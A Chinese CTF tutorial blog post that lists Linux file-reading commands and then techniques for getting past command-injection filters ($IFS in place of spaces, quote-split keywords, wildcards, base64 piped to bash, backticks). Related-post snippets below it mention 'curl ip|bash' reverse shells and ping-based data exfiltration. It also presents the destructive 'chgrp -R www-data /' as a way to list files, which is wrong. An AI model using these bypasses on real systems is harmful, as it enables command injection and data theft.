CTF 中对于 linux 指令的运用

最新推荐文章于 2025-08-21 11:10:37 发布
原创 最新推荐文章于 2025-08-21 11:10:37 发布 · 709 阅读 · 30 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #web安全

文章目录

1/简介

linux 是一种操作系统,可以相对于 windows 来理解。linux 和 windows 的区别主要体现在 linux (1)具有更高的稳定性和安全性,适合服务器环境;(2)主要通过终端进行操作,可选图形化界面;(3)许多技术都基于 linux 进行开发。

2/常用指令

1/查看目录

ls —— 列出当前目录下的文件和文件夹

ls / —— 列出根目录下的文件和文件夹

ls .. —— 列出上一级目录下的文件和文件夹

2/改变工作目录

cd [目录路径] —— 改变当前工作目录

cd / —— 进入根目录

cd .. —— 返回上一级目录

cd ./[相对目录路径] —— 以当前目录为参考的相对路径

3/查看文件

cat filename —— 查看文件内容

4/操作文件

nano filename —— 创建或编译文本文件

php filename —— 默认运行 php 文件

mv oldname/目录 newname/目录 —— 移动文件或文件夹

mv oldname newname —— 可以实现重命名文件

5/删除文件

rm filename/目录 filename/目录 —— 删除文件或文件夹

rm -f filename —— 删除文件或文件夹(无确认提示)

6/查看环境变量

set

env

cat /etc/profile —— /etc/profile 是 Linux 系统中一个重要的配置文件,通常用于配置系统范围的环境变量和其他设置

3/非常规指令

1/列出文件

find / -print —— 列出根目录下的文件和文件夹

dir —— 列出当前目录下的文件和文件夹(用法类似 ls)

tree —— 以树状图的形式列出当前文件、文件夹和文件夹内的所有文件

chgrp -v -R www-data / —— 递归地将根目录下的所有文件和目录的组更改为 www-data,并且在更改每个文件时输出相应的详细信息

echo ${PWD} —— 输出当前工作路径

2/读取文件

tac —— 输出文件的内容,但是反向输出(从最后一行开始向前读取)

more —— 输出文件内容

bamore —— 输出文件内容,使用环境有较高要求

less —— 分页查看文件的内容

bzless —— 与 less 的区别在于可以直接查看 .bz2 压缩文件的内容

head —— 用于显示文件的开头部分,默认情况下显示文件的前 10 行

tail —— 用于查看文件的末尾部分

nl —— 输出文件内容,并给文件内容添加行号

sed -n p —— 输出文件内容

sort —— 输出经过排序的文件内容

uniq —— 输出去除重复行的文件内容

rev —— 输出反转行内文本顺序的文件内容

rev FileName | rev —— 输出文件正常顺序的文本内容

od —— 以八进制的格式输出文件的字节内容

od -c —— 在 od 的基础上同时显示不可打印字符(如换行符、制表符)为可读形式

vi —— 在 vi 文本编辑器中读取文件内容

vim —— 在 vim 文本编辑器中读取文件内容,vim 编辑器是 vi 编辑器的增强版本

man —— 以 man 格式显示文件内容,man 一般情况下是无法解析普通文本文件的

paste —— 输出文件内容

grep x FileName —— 在文件中查找存在 “x” 的行,并将匹配的行输出

file -f FileName —— 读取 FileName 文件中的每一行作为文件名进行文件类型检查啊

dd if=/FileName —— 读取文件内容

date -f FileName —— 读取文件内容,尝试以日期格式解析

a=$(date -f FileName 2>&1);echo $a; —— 类似 date -f FileName

a=$(. /FileName 2>&1);echo $a; —— 类似 date -f FileName

a=$(/f* 2>&1);echo $a; —— 类似 date -f FileName,不同之处在于这个命令本质上是执行文件,因此要使用 chmod +x /FimeName 给文件添加执行权限

diff /FileName1 /FileName2 —— 比较两个文件的不同并输出不同的部分

4/常见绕过

1/空格绕过

  • $IFS
  • ${IFS}
  • $IFS$number
  • %09
  • <>
  • {cat,/flag} —— 执行 cat /flag (仅使用于少数特定场景)

[!CAUTION]

在实战中有时候$IFS无法实现绕过,但是$IFS$number可以,多进行尝试。

2/_绕过

适用于绕过的形式:

$_GET['show_source']

[ + . (空格) 输入 url 中进行 get 传参,最后都可以被处理成 _

3/关键字绕过

1/字符拼接绕过

ca''tca\tca""t —— 等效于 cat

2/通配符绕过

cat /x* —— 输出根目录下所有以 x 开头的文件(非文件夹)的内容

[!IMPORTANT]

这里介绍一下 linux shell 中通配符的用法:

  • *:匹配任意长度的任意字符(包括0个)
  • ?:匹配单个任意字符
  • []:匹配指定字符集中的一个字符
3/编码绕过
  • cat /$'\八进制数\八进制数'
  • echo "cat命令的 base64编码" | base64 -d | bash —— 先执行echo "Y2F0IC9mKg==",再进行 base64 解码,最后执行解码的结果
4/反引号绕过

cat `ls` —— linux 下,会先执行反引号下面的语句,这里会先执行ls,得到结果 fileName,再执行cat fileName,可以绕过对引号和星号等符号进行过滤的情况

5/可变函数机制

('system')('ls');    完全等效于    system('ls');
CTF命令执行题目解题思路
悦分享
08-02 1026
可以看到该文件有curl xx.x.x.x|bash字符,在linux下输入任意一个字符后加\是不会中断当前操作,可以继续输入内容。而后面没有\则会中断,而sh可以在报错的情况下依然会执行可以执行的命令,因此不会影响curl的执行。在自己服务器中放入bash一句话,利用curl ip|bash反弹shell。ls -t >g是倒序输出文件名字,然后sh _执行此文件,写入到g中。原理就是利用curl ip|bash等很多方式去反弹shell。利用linux下特有的命令来写入shell反弹。...
详解Linux常用命令.rtf
09-09
Linux 命令很多,但最常用的并不多 ,本文档内容充实,主要针对用Linux 常用命令进行介绍,以命令示例说明命令如何使用。
CTFlinux基本命令
m0_62102520的博客
06-23 679
1.
CTF学习 -- Linux基础
xx16755498986的博客
05-23 924
CTF竞赛中,掌握Linux基础技术是至关重要的。本文将介绍在CTF竞赛中常用的Linux基础技术,包括常用命令、流、管道和重定向、用户组和文件权限、环境变量、procfs文件系统、字节序以及调用约定。每个部分都将提供详细的解释和实际代码例子。在CTF竞赛中,熟悉常用的Linux命令是必不可少的。流、管道和重定向是在CTF竞赛中处理数据流的重要技术。将一个命令的输出作为另一个命令的输入将输出保存到文件中(覆盖)将输出追加到文件中在CTF竞赛中,了解用户组和文件权限对于解决问题非常重要。
CTF-window和linux命令执行的知识
半岛铁盒的博客
12-02 433
command1 & command2 :不管command1执行成功与否,都会执行command2(将上一个命令 的输出作为下一个命令的输入),也就是command1和command2都执行 command1 && command2 :先执行command1执行成功后才会执行command2,若command1执行失败,则不执行command2 command1 | command2 :只执行command2 command1 || c...
linux常用命令
半岛铁盒的博客
12-17 352
strings webshell.pcapng | grep { 查找带有{ 的字符串 很好用
CTF相关命令使用
01-21
在网络安全领域,尤其是参与CTF(Capture The Flag)竞赛的过程中,掌握有效的工具和命令至关重要。本文档旨在介绍一系列实用的命令和工具,帮助用户从发现目标系统漏洞到最终获取系统权限的过程。 #### 二、查找IP...
pin-in-CTF:使用intel pin来求解一部分CTF challenge
05-09
插桩技术是在程序执行过程中动态插入额外代码的技术,Pin通过这个方法可以对程序的每一个指令进行监控,记录函数调用、内存访问、系统调用等关键行为,这对于逆向工程和漏洞分析非常有用。 3. **在CTF挑战中的应用...
网络安全CTF竞赛中Miscellaneous题型常用工具与资源汇总:涵盖隐写术、编码转换、数字取证等技术领域
05-25
还提供了多个在线资源,包括CTF比赛平台CTFtime.org、学习平台CTF Field Guide以及Kali Linux工具集等;并分享了一些实用技巧,如使用`file`命令确定文件类型、识别Base64等常见编码、关注文件头尾等隐写常见位置。;...
CTF Web 查找 Flag 命令与方法总结
最新发布
weixin_44716194的博客
08-21 574
CTF Web 查找 Flag 命令与方法总结
ctf中的数据外带
03-30
利用`>`、`>>`以及`tee`等Linux命令,可以将命令执行的结果保存至指定路径或将流量重定向到外部地址。例如,在某些RCE(Remote Code Execution)题目中,可通过以下方式完成数据外带: ```bash ping `whoami`....
linux命令大全(按首字母顺序_含详细说明及实例)
04-08
linux命令大全(按首字母顺序_含详细说明及实例),内容非常详细。有各种例子介绍,内容非常详细。有各种例子介绍内容非常详细。有各种例子介绍
CTFWEB——LINUX命令执行及函数特性各种payload(持续更新)
2301_80038080的博客
03-07 414
系统变量拼接 ${PATH:14:1}${PATH:9:1} ${PATH:9:1}?命令和文件中间如果是空格可用通配符,如果是重定向符(<,<>等)则需要完整文件名(可以用绕过单词的方法)find / -type f -name "*flag*"(全系统找文件名含flag的文件)find / -type f -exec grep -iH "flag" {} \;(想查看报错的时候但关闭了报错,把错误输出输出到标准输出流中)(把无回显的结果输入到文件中查看)(列出当前文件夹路径)
CTF指令收集
bouIevard的博客
07-14 1131
CTF常用指令 Linux操作 1.给当前用户root权限: sudo su 2.安装软件 sudo apt-get install name 3.运行文件 ./filename 3.获取ip地址 ifconfig 4.查看当前目录下文件 ls 查看权限 ls -alh 5.进入目录 cd path 6.使用ssh文件登录ssh服务 ssh -i sshfilename username@ip 7.修改文件权限 chmod mode filename 其中mode如下: [ugoa][[±
Ping命令、常用管道符、Linux windows的常用命令、 Buuctf[ACTF_2020-Exec]、 [GXY_CTF-Ping Ping Ping]
veinard_F的博客
06-06 1234
ping命令
CTF权威指南 笔记 -第四章Linux安全机制-4.1-Linux基础
m0_64180167的博客
05-08 754
这里给出linux常用命令
CTFLinux基础(非常详细)从零基础到精通,收藏这篇就够了!
喜欢Python编程的程序员柚柚呀
05-13 1148
lscd [path]pwdcat [file]rm [file]pstopkillifconfigpingnetstatsuchmodchownexitvar=value${var}cmd'string'"string"fg先别急着uname -a,看看你的发行版是啥,根目录可能略有不同。lscp/usr/bin/usr/libkillkill [PID]Linux是多用户系统,每个用户都有UID和GID,就像身份证号一样。id root?
CTF中的命令执行绕过方式
2401_84466223的博客
06-03 1800
cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;shell 提供了 && 和 || 来实现命令执行控制的功能,shell 将根据 && 或 || 前面命令的返回值来控制其后面命令的执行。连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。默认情况下,进程是前台进程,这时就把Shell给占据了,我们无法进行其他操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个'&'实现这个目的。
linux基础之常用命令(1)
爱生活 爱编程
05-03 564
linux基础之常用命令(1)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值